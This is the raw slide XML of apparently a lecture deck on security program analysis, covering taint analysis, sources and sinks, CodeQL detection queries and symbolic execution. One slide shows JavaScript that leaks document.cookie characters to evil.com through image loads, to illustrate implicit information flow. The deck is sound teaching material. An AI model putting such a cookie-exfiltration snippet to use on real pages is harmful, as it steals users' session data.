            <a:ext cx="2040496" cy="78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3" tIns="25403" rIns="25403" bIns="25403" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/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Context: {f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, g}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x: {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>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x-&gt;y = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sms_msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>x-&gt;z = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>.com}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1462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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 2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static analysis techniques is to characterize all possible run-time behaviors over all possible inputs without actually running the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When applied to security, the goal is to find possible bugs, or prove absence of certain kinds of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static analysis has been around for a long while</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Type checkers, compilers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formal verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Challenges: soundness, precision,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272468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Taint Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 4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taint analysis is a security-typed characterization of information flow control </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Term originates from Perl (Larry Wall)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Idea: Label sources of untrusted data as “tainted”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses of tainted data transfers taint to destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitization removes the taint from the data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346696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Taint Sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1178" name="Shape 117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Taint sources include wherever there is untrusted input to a program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Environment (arguments, environment variables)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>interaction</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Shared memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Requires mapping between taint sources and APIs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17263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Taint Propagation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Shape 11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rule: Any value derived from tainted data is itself tainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What does "derived" mean?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Control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5457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tainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b = a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b is tainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b = a + c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b is tainted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if (a == 1) then b = 5 else c = 8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b, c are tainted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299412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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.cookie.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>++) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[0] == “a”) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/a”)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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[0] == “b”) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/b”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="14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67470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Taint is removed by sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possibly by other user-defined policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Careful selection of propagation policy required to avoid the taint explosion (over-tainting)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Sinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="Shape 118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Sinks represent critical points in the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violations are present if tainted data can reach a sink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Taint should never reach return addresses on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taint should never reach a function pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taint should never reach array indices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taint should never reach path buffers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taint should never reach a SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Taint should never reach a write statement when generating a web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4118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Static Taint Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in C</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 45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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>void printf(untainted char*, ...);</a:t>
            </a:r>
          </a:p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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int main(int, tainted char**);</a:t>
            </a:r>
          </a:p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600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int main(int argc, char** argv) {</a:t>
            </a:r>
          </a:p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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    printf(argv[1]);</a:t>
            </a:r>
          </a:p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600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="284114">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="215238" algn="l"/>
                <a:tab pos="438448" algn="l"/>
                <a:tab pos="661659" algn="l"/>
                <a:tab pos="876897" algn="l"/>
                <a:tab pos="1100107" algn="l"/>
                <a:tab pos="1323317" algn="l"/>
                <a:tab pos="1546527" algn="l"/>
                <a:tab pos="1761766" algn="l"/>
                <a:tab pos="1984976" algn="l"/>
                <a:tab pos="2208186" algn="l"/>
                <a:tab pos="2423424" algn="l"/>
                <a:tab pos="2646634" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3168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marL="245531" indent="-245531" defTabSz="363035">
              <a:spcBef>
                <a:spcPts val="1444"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Imagine that taint specifications have been applied to sources (e.g.,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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>) and sinks (e.g.,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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> format string)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="245531" indent="-245531" defTabSz="363035">
              <a:spcBef>
                <a:spcPts val="1444"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>A taint analysis should flag the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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> call in </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Hack"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> as a violation of the policy that tainted data should not flow to sensitive sinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127934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EBC-F6A5-C301-8DD5-9F1A7052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E40F-3C60-0B00-C9A4-D3B01A10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CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a query language that treats code as data, enabling security analysis and vulnerability detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> analyzes the source code distribution and generates a fact knowledge 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AST Nodes: Abstract Syntax Tree representations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 Flow Graphs: Flow of code execution paths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Flows: Information about variables, taint sources, and sinks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows one to write custom queries to explore the fact base and detect vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p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codeql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database create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myDB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--language=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--source-root=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src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2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568B-B1A8-45BE-14C1-BD62C3AF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CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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1F92-4096-9B88-132F-C7E03FED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Components in a Query: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import:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Imports the specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CodeQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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from, where, select:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Main clauses used to filter and select data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Basic Query Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Finding all function definitions in the C code base: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 Function f select f, "Found function definition: " +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f.getName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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236948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6277-CB58-47F2-54D0-9E2E4E6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905C-92A3-00C5-B499-E9E7CA95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cpp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b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FunctionCall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call where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call.getTarget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getName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= "system" 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call.getArgument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(0).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isSource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select call, "Potential code injection: untrusted data passed to `system()`."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1110550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589D-9AF7-67AB-37CB-251F7B0B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AFAB-3FA7-CE46-0E2B-C8FBBCE0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FunctionCall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call, Variable filename where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call.getTarget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getName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= "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fopen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call.getArgument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(0) =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filename.getAddress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filename.isSource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select call, "Potential path traversal vulnerability in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fopen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687375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9AAB-E621-7A6F-831A-1EEE536B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1350-F697-BAFB-6FC1-0CA98B34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FunctionCall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call, Variable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where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call.getTarget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getName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= "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memcpy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call.getArgument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(0) =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dest.getAddress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and not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call.getArgument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(2).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hasConstantSize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select call, "Potential buffer overflow in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memcpy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due to unchecked size."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417489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AFB4-DCB3-C6A8-DB62-879F8A95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DataFlow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D7FE-6BF3-976D-C1C9-DEBA95A9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DataFlow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> library can help identify complex vulnerability patterns, especially in taint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cpp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from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DataFlow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PathNode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source,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DataFlow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PathNode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sink where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source.isSource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sink.isSink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source.isReachableFrom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(sink) select sink, source, "Data flows from untrusted source to sensitive sink."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1783959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Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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"How do I trigger path X or condition Y?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Dynamic analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Input A? No. Input B? No. Input C? …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Based on concrete inputs to application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>(Concrete) static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>You can’t/You might be able to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Based on various static techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300304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Execution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sym typeface="Calibri"/>
              </a:rPr>
              <a:t>"How do I trigger path X or condition Y?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Interpret the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Track "constraints" on variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>When the required condition is triggered, "concretize" to obtain a possible input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37635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Concretization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sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Constraint solving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Conversion from set of constraints to set of concrete values that satisfy them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>NP-complete, in general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1426424" y="3547608"/>
          <a:ext cx="1678550" cy="10972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Constraints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7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x &lt;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5734924" y="3887639"/>
          <a:ext cx="1678550" cy="4114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38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Roboto Light"/>
